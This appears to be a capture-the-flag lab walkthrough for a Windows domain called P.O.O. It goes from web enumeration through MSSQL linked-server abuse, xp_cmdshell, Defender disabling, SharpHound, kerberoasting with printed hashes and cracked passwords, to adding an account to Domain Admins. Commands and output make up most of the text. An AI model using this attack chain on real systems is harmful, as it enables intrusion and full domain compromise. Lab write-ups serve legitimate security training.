P.O.O
Entry Point
10.13.38.11Lets start with our initial nmap scan
sudo nmap -p- --min-rate 1500 -T4 10.13.38.11 | cut -d"/" -f1 | tr '\n' ','we have the following ports open on the target machine 10.13.38.11
80,1433Lets run a more in-depth scan of the target
sudo nmap -sCV -p80,1433 10.13.38.11 -oA 10.13.38.11_tcpresults
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-19T12:27:43+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowswe can see
HTTP Microsoft IIS httpd 10.0 server
domain name
intranet.poowe can add this to our hosts filemssql server 2017
Lets check out the webserver
Looks like a default IIS server
Lets run feroxbuster and see if we can discover anything
feroxbuster -u http://intranet.poo -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o 10.13.38.11_dirs.txt -x asp,aspxLets check for any vhosts
wfuzz -c -f sub-fighter -u '10.13.38.11' -H 'Host:FUZZ.intranet.poo' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt | grep -v "703 Ch"Nothing interesting
Lets run nikto to see if we can find any vulnerabilities
nikto --url http://intranet.poowe do se somthing interesting
We can see the web server has a .DS_Store file withim the servers Root directory
what is a .DS_Store file ?
it is a hidden file that is automatically created by MacOS operating system when a user opens a folder with the Finder application. The file contains information about which files are in the folder and contains options such as what icons look like.
Why do we care?
here is a great blog that can explain that better then myself
We can utilize the following parser to enumerate the .DS_Store file
sudo python /opt/DS_Walk/ds_walk.py -u http://intranet.pooresults
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://intranet.poo/admin
[!] http://intranet.poo/dev
[!] http://intranet.poo/iisstart.htm
[!] http://intranet.poo/Images
[!] http://intranet.poo/JS
[!] http://intranet.poo/META-INF
[!] http://intranet.poo/New folder
[!] http://intranet.poo/New folder (2)
[!] http://intranet.poo/Plugins
[!] http://intranet.poo/Templates
[!] http://intranet.poo/Themes
[!] http://intranet.poo/Uploads
[!] http://intranet.poo/web.config
[!] http://intranet.poo/Widgets
----------------------------
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://intranet.poo/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://intranet.poo/Images/buttons
[!] http://intranet.poo/Images/icons
[!] http://intranet.poo/Images/iisstart.png
----------------------------
[!] http://intranet.poo/JS/custom
----------------------------
[!] http://intranet.poo/Themes/default
----------------------------
[!] http://intranet.poo/Widgets/CalendarEvents
[!] http://intranet.poo/Widgets/Framework
[!] http://intranet.poo/Widgets/Menu
[!] http://intranet.poo/Widgets/Notifications
----------------------------
[!] http://intranet.poo/Widgets/Framework/Layouts
----------------------------
[!] http://intranet.poo/Widgets/Framework/Layouts/custom
[!] http://intranet.poo/Widgets/Framework/Layouts/default
----------------------------
we can see a number of interesting entries such as dev and admin
when we navigate to http://intranet.poo/admin, we are greeted with a login prompt
we need a way of finding admins credentials
after some googling we do find this
essentialy we can utilize the "~" tilde to enumerate files and folders on the IIS server. we can use the tilde to discover the first six characters of files and folders along with there extension
we can utilize the following tool
shortscan http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/dbresults
We need to find the missing character we can use wfuzz for this
we can see the http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/ contains a file poo_co*.txt we need to find the rest of the filename
create a wordlist
grep '^co.*' /opt/running wfuzz
wfuzz -c -u "http://intranet.poo/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt" -w ./fuzz.txt -t 20 --hc 404we do find one 200 response
navigating to
we can see the following
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{flag}Lets see if we can authenticate to the mssql server
sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py 'external_user:#p00Public3xt3rnalUs3r#@10.13.38.11'
first i want to see if ica n run commands with the xp_cmdshell
enable_xp_cmdshell
no luck
Lets conduct some basic enumeration
mssql version
select @@version;
List the databases
select name from master.dbo.sysdatabases;
current datebase
select db_name();
couldnt find anything to interesting
We could utilize a mssql server link and point it to an external source
Lets find our current servers name
selectt @@servername
we can check for linked servers, we can query the
sysserverstable
select srvname from sysservers;
we can see there is another linked remote server
POO_CONFIG
we can utilize the EXECUTE to run queries on other servers
example
EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG]
after enumerating further there wasnt anything to interesting
Lets see if we can get POO_CONFIG to execute queries on POO_PUBLIC
EXECUTE ('EXECUTE (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
notice how the command ran as the 'sa' users, from what i can tell this is most likely a configuration issue, the issue resides in allowing any users on
POO_PUBLICthe ability to run queries onPOO_CONFIGas the internal users, but the second link looks like it allows any user from thePOO_CONFIGto run queries as the 'sa' user
we can see when when we check our permissions through POO_CONFIG -> POO_PUBLIC
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];entity_name permission_name
-------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER we can see we have ALL the permissions
Lets create a new 'sa' user with a password so we dont have to keep relying on server links
creating a user
EXECUTE('EXECUTE(''CREATE LOGIN shrek123 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
giving our user the necassary permissions
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''shrek123'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
Lets login via our newly created user
sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py 'shrek123:qwe123QWE!@#@10.13.38.11'we are now logged in as a systems administrator
reading the flag
select name from master..sysdatabases;
select table_name,table_schema from flag.INFORMATION_SCHEMA.Tables;
Lets enable xp_cmdshell
enable_xp_cmdshell
xp_cmdshell whoami
Note: when we have triggers in place these are essentialy a policy put in place to alert and block attempts at certain actions such as enabling xp_cmdshell, these triggers reside in the
sys.server_triggerswe can disable them by
disable trigger ALERT_xp_cmdshell on all serversNow that we have command execution our next bet will be to estblish a revers-shell on the system
Lets check out the web.config file
xp_cmdshell type C:\inetpub\wwwroot\web.config
Alright i want to try and find a way to access this file
fun fact, when a webserver is enabled to run the stored procedure sp_execute_external_script, and that it is configured to do that as a different user, so lets try and use the this particular procedure to run a simple python script
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("whoami");';we can see this procedure is running under the user of poo_public01
Lets see if we can read the web.config file now
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("type C:\inetpub\wwwroot\web.config");';and we know have the contents of web.config file
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>Lets try these creds at the /admin login prompt we found earlier
they work
i dont see a way in the terms of a foothold within this page, lets go back our mssql client and enumerate the machine further
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("ipconfig");';we do find an IPv6 address
dead:beef::1001Lets see what nmap can find on this address
sudo nmap -A -6 -p- --min-rate 10000 dead:beef::1001results
Host is up (0.30s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info:
| dead:beef::1001:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-20T02:31:26+00:00; +2s from scanner time.
| ms-sql-info:
| dead:beef::1001:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
TRACEROUTE
HOP RTT ADDRESS
1 297.48 ms dead:beef::1001
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.85 seconds
we can see winrm is enabled, meaning we should be able to use evil-winrm and gain access to the machine
we need to add the the hostname and IP address to our hosts file
execute sp_execute_external_script @language =N'Python',@script=N'import os; os.system("hostname");';
COMPATIBILITY
Now we should be able to win-rm into the machine
evil-winrm -i COMPATIBILITY -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'it worked
Now we need to find a way of pivoting
we can upload SharpHound.exe via winrm, but try to execute the tool we encounter some problems, Since Administrator is not a domain account we cant query the domain, so we will run SharpHound.exe via our mssql client since we have access to a service account shrek123 we can impersonate a computer account which can query the domain
upload SharpHound.exe via winrm
cd C:\Users\Public
upload SharpHound.exe
execute SharpHound.exe via mssqlclient
xp_cmdshell C:\Users\Public\SharpHound.exe -C All --outputdirectory C:\Users\Public
Now we can download the output zip file onto our local machine and ingest it to bllodhound
download 20240120055112_BloodHound.zipLooking through bloodhound we can see within the built in query Shortest Paths to domain admins from kerberoastable users
we can see the user P00_ADM@INTRANET.POO is a member off the help desk and has GnericAll privileges on the Domain Admins group, meaning we can add any member to the Domain Admins group
Lets perform some kerberoasting on the user
P00_ADM@INTRANET.POO
we will utilize the
Invoke-Kerberoast,ps1script from
before we run the powershell script via winrm Lets turn off defender to be safe
Set-MpPreference -DisableRealTimeMonitoring $true
Now we can upload the script
upload Invoke-Kerberoast.ps1Now just like SharpHound we are going to utilize our mssqlclient session and execute the script
xp_cmdshell powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcatresults
output
--------------------------------------------------------------------------------
NULL
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_hr$intranet.poo$HR_peoplesoft/intranet.poo:1433*$EB1AEBE78B878A5F003B4181534EEB
8E$486776D2198FDC0871DD2F27802D2F7B078EDDA8A080D3B7C7A459F5DBA2B071FBB3CA5D0817AD590C1C08EA372DE
FB79E76D979DD39B9B209B33394D22F388EBA8F1FB28F4C883A4C394A72C230DCDFC0094EAF988CBCC6F3BDA0E98CF92
5ED5DD3369C1488A8E85AE60E35A7EB80EF509653849DC1D276F924E1E72861E86B55F0A96AE7284D31A7435F9FF6D7F
62C55C8C8B3041398BB1226E633AC663365188F131AB502D444A4DFB7FE2E6729AFBAC67618019B23835CC60BCC0A37C
8FF2ABF381AED944618268A22133E78E10B656E4E2870CBF571D87338842AAC3DA2E1716A22532ABAC398329101A6DBA
B625B754E293AF3CAEECB9949CF13F1DC35FD84E20CBB992E546289BF126E3C9BC513DB10D1D297DAAFA2FEBB905383F
9C4F2686DAAEE3846B7623727C103668F75792766E8F008A9C049A99FBDAA540AD8610743B486C9C3C77EBDDDAFDC885
27FCBAB63ABAB2C8E804B90DE973AC83F2CA3EC5B0FDEA8DED92E383A15DFB92FE9945505C22246776E611BD3BC6F061
B4A66310E152EE51C6AB0028604F33EE94313CA0109B9B7DC16D6EE77A3B5021EF633D4E87F281F8BC055FD19DB37B02
0158797221D6BD0794E5AA88DD524889C7FDB61581C927CB84D576C17FDDBFF0E54A4C0AF3322A3C5833478FBDB823F2
5FA500D5044DC0F32F3EBAD797461625EAE3E96934505A259F0BC6F937A9FF53F05E7552587AE10F9E05E96A9C31231D
E15F97166043AE950695E978A32E3F4AF543D691F60BC5D76ED546C2615A06206590535D1B0DE5A8D1F0F3E878194A8B
F33ACECAC0331BD7CC7F9BB5D487D550A4B71FADBBFFE9B9908794BC73FE53A1800CB92F5375B72CC6DD2DC7DF19E1AC
00AABB5A89B35BBB149329473369DEBA7B60CA05AC345327D7AE7E7004AB9C949BB99238FCD8A01B51A3E5FA01131170
FA45604743F217EF518A3594DF05B89DD3F639BAF603E04E8D603414EAF181CA1F1B90AE03F31E997D504CA9BE0A727F
44832AA4FA3B769995837151FC476D76FFFAAA7914B367A40E3F7F683C6159C540401DE3A7C2DA132F8FF6A029BA548C
EF0456E941D8D64B4B2529E20DD87008044D320FDE3EB8AF1C638421AAB3DF883C3C7D389D9BB015811C77D5C05C8764
25A32D4DD97DF8312C0DEE98A42D0476E9670E046E21055FE2AE979F8F37EEE52C0265160FFA290EFA0268521A76F46A
35CB960DCB33F46C8BA5A5D23058AD1AE7501A0366E87870C7C487E43433C5872E6786EDCAEECC468E817685D6A5C485
1622A629E8E2EE422AB305474216EF670677B27563EC9431EBC3F2B45295C3B847C0FD3F45BF8BEAE40DBFEE925BE046
F4A7668D49A9E330C2B22ECD99D09333576DC510B99C3C9A3D2ACE5EB1AF4E5FFA7E1A0837D625BB08D2E35D2ED35F89
2C0ECE21DC9A65A8A68892B581CC8BAA744F4081B4B00C2B08579526D162E4190C5B388350D9F3456D819207C2BDF
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
NULL
TicketByteHexStream :
Hash : $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$6531D8D31E5BCFC5A692FAC3B83B721C
$48E4F730BF9D08D72F218B9764AA435DE18E1A130EC729FB616FEA77AE35322B34D8942B6AAB60D4546EA9B59CCAA30
8AD57134EC5AF91337ED5B0A91BD390500444EED9164288986F8EB430A088F5EE66DDF275D607ADB279400E18F040C92
C90FFDF849DACB340F645BA24871BB50142681DE34E8E9ED43C2DAE687ABA1203BB25B32058985AFC71871E3109656D8
0F0C426AEA5DE1F68410F9A5EF7772C899A41CD3FF732FAE6DC7A0334DD102786B05C20CF92E5DE656DFF51DDA7F7081
53E26B194CCFA90A7CF7446C56DD12548383EDA97266EAF17E6EC6B11C2E74598C43A76800D245E12BA4D8E116DC15FA
B010F96C8BB827ABBA702EED1493A520E2B803EE23B5FCC802BE40B23EB1D97C64352F88556690C7B05C94D752C92118
3AB83A62AFB19160C81A627A9D5C09277BCAE39240362FE00545E030CE9CFC3959021B472C7E9201533DE5D06624739B
A9EA3EB87B0B47563D9BF097D3E52F09B13E6B8352728C75B23566ABFB23A7654749701FCE122EBEEC572DAF2C3C9496
472345E78A4BC06263D124D7E7270E9AB1E23875E85C280D9A99222753F4E348DE0007E78D9F650F540E11C55C4EAA1D
E9C15924C0A9A475CD0C9D5C5BF9CA8DF225E1E0E2AA56D7FA45C137209A8272FF177C21BEDBB58A153A810A056BD4E6
F1C5D59832635779B257A49C3CB29199E60925012E8371715C96AD5F1A8BD4D2C559C07D51A08C44444E3870CCA5B3B4
642987C8ABE1DCC028E4949A8D3CE4F16C4C5D3B387078299E259FFB61CECEDD16508E6554B299C290850903872AED0F
D3AC11E5CDD86D7FF9DB3D19D190FD78335D716CD753DD50A7F2DDAAC35F04684599823BFD5D4D10B1A71A8033C7B7F2
A2737AA9BD9BA79533C45D494E21DFE89DEDCDFB427E1E6E0F72C61711D81392677B5C5A4D1C0345E81B9EA03F632774
A0485250498C88A1B53ED1130C7CA17A0BE9CC797D6B88B5EE493735921AC563A11E76A28870550ACAA5EA7BE9D23C2F
F7C3074BD61BD0FD995753A17480A1814D394D3E24023B0307A49440CC79747F2AEED98ABD84816A94DEEC9587E4B098
5DE77784D8520AD5DA7460FF3DE26336401E49F689E3338FD0857CBFEAF251357E20A64AD68EB98B713451EA752147F4
1E4ED4307BE0B09BF4865A9B7EC931BCCCB9B7129E7E87E03AEDB73401F34E5101B2D380799EFE41EDB9298403D30218
F043DD3283DD801946BF09F163E37F0EF969F8FEFAAE2FA8975FF646613FF6F653F78C467BC45BC05D268B4EFEF5D62C
CD0F0B096690C315523798A78030EFA3519B78D55181FE9932A58EC346230A56D36AC4EFE6D8B546C9C4A51E8DF06206
EE3FE67770E351CA2894E3FCFCC4ACFB89CD8A2C43CEF8E6AB0DECBBDEF560261A2A59A523A0DA23E948B659CC3C4C0B
8F6445A7ABC4ED14D4E3B7FFBB117573D1D5F02010BD3B3F0EF0A36DCE9CBE32AA862E1A5E35825FD3A530014E9
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
NULL
NULL
NULL
NULLwe can see two account have returned a hash, lets utilize hashcatt and crack these
To help clean the hash and get it ready for cracking
cat poo | tr -d '[:space:']tried to crack theb hashes but no luck, maybe the hash broke somehow
Now we can crack it using hashcat
hashcat -m 13100 hash /usr/share/wordlists/seclists/SecLists-master/Passwords/Keyboard-Combinations.txt --forcewe had to try a few different wordlists but eventually found it
creds
p00_adm: ZQ!5t4rNow we can use p00_adm's account and add it to the Domain admins group, then we can upload PowerView.ps1
Lets upload
PowerView.ps1via winrm, and import the module
upload PowerView.ps1
import-module .\PowerView.ps1Lets create a PS credential
$Pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $Pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $CredNow that p00_adm is part of the domain admins group, we can use the account to access the c$ share on the DC
net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'dir \\DC.intranet.poo\c$\users\
Last updated